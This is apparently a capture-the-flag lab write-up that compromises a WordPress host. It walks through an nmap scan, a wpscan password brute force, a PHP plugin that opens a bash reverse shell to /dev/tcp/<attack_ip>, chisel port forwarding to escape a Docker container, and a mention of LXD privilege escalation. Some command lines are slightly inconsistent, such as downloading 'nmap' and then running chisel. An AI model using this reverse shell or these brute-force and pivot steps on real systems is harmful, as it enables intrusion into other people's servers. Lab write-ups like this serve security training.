For Business Reasons Wordpress Enumeration - Docker Escape by Pivoting - LXD Privilege Escalation
Scanning
Nmap scan results
Copy # Nmap 7.94 scan initiated Fri Jun 30 15:03:29 2023 as: nmap -p 80 -vvv -T4 -sCV -A -oN nmap.log 10.10.6.91
Nmap scan report for 10.10.6.91
Host is up, received syn-ack (0.23s latency).
Scanned at 2023-06-30 15:03:30 IST for 30s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))
|_http-title: MilkCo Test/POC site – Just another WordPress site
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 000BF649CC8F6BF27CFB04D1BCDCD3C7
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 30 15:04:00 2023 -- 1 IP address (1 host up) scanned in 30.77 seconds Enumeration
Copy $ wpscan --url http://10.10.10.x -U sysadmin -P /opt/rockyou.txt
Copy +] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.6.91/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.6.91/, Match: 'WordPress 5.4.2'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:37 <==============================================================================> (137 / 137) 100.00% Time: 00:00:37
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - sysadmin / milkshake
Trying sysadmin / rachael Time: 00:07:19 < > (1665 / 14346057) 0.01% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: sysadmin, Password: milkshake Find the vulnerable theme version and upload a reverse shell on 404.php template - twentynineteen in this case !
Or we can even upload a vulnerable plugin
Copy <?php
/**
* Plugin Name: Reverse Shell
* Plugin URI:
* Description: Reverse Shell
* Version: 1.0
* Author: Richard OBZ
* Author URI: https://onlineblogzone.com/
*/
exec("/bin/bash -c 'bash -i > /dev/tcp/<attack_ip>/9001 0>&1'");
?> Now zip this file and upload it by browsing to Plugins and then Add New
Meanwhile start the listener and now upload the zip file and activate the plugin - we get a shell !
Within the current directory we see a script which shows that we are inside a docker container
The content of start_container.sh is
Copy #!/bin/sh
cd /data
exec 2>&1 1> /data/start.log
myip=$(ip route | grep -v docker | grep src | awk '{print $9}')
sed -e 's-define("WP_HOME","http://.*");-define("WP_HOME","http://${myip}");-' -i /data/wp-config.php
sed -e 's-define("WP_SITEURL","http://.*");-define("WP_SITEURL","http://${myip}");-' -i /data/wp-config.php
#docker stack rm wordpress
#sleep 10
#docker stack rm wordpress
#sleep 10
cd /data
docker stack deploy wordpress -c wordpress_stack.yml This confirms us that we are inside a docker container and to escape this - we'll first have to figure out our IP - this can be done using hostname -I
Copy 10.255.0.4 172.18.0.4 10.0.0.5 So our internal IP address is 172.18.0.4, we can now scan it via netcat
Looks like port 22 is open on 172.18.0.1
Let's try some port forwarding techniques using chisel !
Copy On the attacking machine
$ python3 -m http.server
$ chisel server -p 1337 --reverse
On the host
$ curl http://<attacker_ip>:8000/nmap -o nmap
$ chmod +x chise;
$ ./chisel client 10.8.74.51:1337 R:22:172.18.0.1:22 After a successful connection, we can now login to the ssh server with the same credentials
Copy $ ssh sysadmin@127.0.0.1 Privilege Escalation
Since the sysadmin user is a part of the lxd group - we can craft our own alphine image and escalate our privileges :)
